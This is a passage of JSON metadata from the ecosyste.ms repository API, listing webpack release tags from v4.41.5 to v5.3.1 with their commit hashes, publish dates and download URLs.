s.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpa